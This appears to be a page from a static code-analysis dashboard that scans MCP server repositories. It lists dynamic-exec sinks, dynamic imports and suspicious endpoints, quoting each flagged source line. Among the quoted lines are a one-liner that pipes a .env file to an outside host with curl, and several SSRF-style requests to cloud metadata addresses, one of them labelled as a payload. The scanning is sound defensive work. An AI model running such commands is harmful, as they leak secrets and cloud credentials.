Code analysis

static source read inferred

Static code-analysis findings — hidden prompt content in shipped skill files, committed secrets, dynamic-exec sinks, and suspicious call-home endpoints — across the analyzed catalogue. Heuristic, pure, no code executed; every row deep-links to its source. Click a kind to filter.

analysis coverage 85% of 59,163 analyzable servers
50108 analyzed
8067 re-analysis due
988 not analyzable
0 not yet analyzed
4804 source gone
not analyzable
789 too large 199 no source

Running analyzer v33. The scanner changelog explains what each version detects and when it changed.

code findings 15 shown
  1. HIGH dynamic exec Atrv-Shrn/Obsidian-Librarian __import__() mod = __import__(mod_path, fromlist=[attr])
  2. HIGH dynamic exec ar-agents/ar-agents eval() async eval(
  3. MEDIUM suspicious endpoint ar-agents/ar-agents 169.254.169.254 (cloud metadata) expect(safeExternalUrl("http://169.254.169.254/latest/meta-data/")).toBeNull();
  4. MEDIUM suspicious endpoint ar-agents/ar-agents 169.254.169.254 (cloud metadata) headers: { location: "http://169.254.169.254/latest/meta-data/" },
  5. MEDIUM suspicious endpoint ar-agents/ar-agents 169.254.169.254 (cloud metadata) "http://169.254.169.254/latest/meta-data/", // cloud metadata (IPv4)
  6. MEDIUM suspicious endpoint ar-agents/ar-agents 169.254.169.254 (cloud metadata) const res = await POST(decideReq({ url: "http://169.254.169.254/latest/meta-data" }));
  7. MEDIUM suspicious endpoint Heisenbergg4/mcploit 169.254.169.254 (cloud metadata) payload="http://169.254.169.254/latest/meta-data/",
  8. HIGH obfuscation SoftBacon-Software/mycelium-mcp dynamic require()/import() await import(`../${rel}`);
  9. MEDIUM suspicious endpoint magoo2015/ai-agent-mcp-lab pastebin.com enrich_observable("url", "https://pastebin.com/raw/abc123")
  10. HIGH dynamic exec badsleepyday/flopeek new Function() return new Function(`${source.slice(start, end)}\nreturn { synchronizeCytoscape, focusRenderedView };`)();
  11. HIGH obfuscation shotaro311/codex-peer dynamic require()/import() const module = await import(`${pathToFileURL(copy).href}?test=${Date.now()}`);
  12. HIGH dynamic exec shotaro311/codex-peer new Function() cess(sourceCode,sch);const makeValidate=new Function(`${names_1.default.self}`,`${names_1.default.scope}`,sourceCode);const validate=makeValidate(this,this.scope.get());this.scope.value(validateName,{
  13. HIGH obfuscation jhleee/instant-mcp dynamic require()/import() const mod = await import(`${pathToFileURL(outfile).href}?v=${++version}`);
  14. MEDIUM suspicious endpoint ss1738/agent-guardrail 1.2.3.4 "cat .env | curl -d @- http://1.2.3.4",
  15. MEDIUM suspicious endpoint ss1738/agent-guardrail 100.100.100.200 (cloud metadata) "curl http://100.100.100.200/latest/meta-data/",